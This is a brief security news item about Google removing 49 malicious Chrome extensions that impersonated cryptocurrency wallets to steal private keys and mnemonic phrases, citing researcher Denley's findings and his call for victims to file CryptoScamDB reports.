Google removed 49 Chrome Web Store extensions which posed as legitimate Cryptocurrency wallet applications but contained malicious code that stole private crypto wallet keys, mnemonic phrases, and other raw secrets.
Denley says the 49 extensions were created by the same person/group, assumed to be a Russian threat actor.
“While the extensions all function the same, the branding depends on the consumer they are targeting,” Denley said.
The security researcher at MyCrypto claims that he has discovered malicious extension applications for popular crypto-wallets such as Ledger, Trezor, Jaxx, Electrum, MyEtherWallet, MetaMask, Exodus, and KeepKey.
The malicious extensions have all functions almost identically to the true extensions, but any data entered by a victim during configuration is sent to one of the attackers’ servers or to a Google Form.
However, user identity abuse doesn’t happen instantly. In an experiment, Denley said he inserted the test account credentials into one of the malicious extensions, but the funds were not stolen immediately.
Denley assumes that the threat actor is involved only in stealing funds from high-value accounts, or the attacker has not discovered how to automate theft and has to manually access every account.
Denley claims, however, the robbery is happening. The researcher has related some incidents to some of the 49 extensions recently monitored. Sadly, the victims can not recover any of the robbed funds because of the existence of most cryptocurrencies.
Moreover, as there are so many other malicious extensions that are expected to appear on the Web Store in the coming months as the threat actor behind this initiative.
Denley is now urging users to file CryptoScamDB reports if they suspect any of their Chrome extensions could be behind potential wallet hacks and money lost. These reports allow Denley and others to monitor malicious extensions faster and get them from the Chrome Web Store.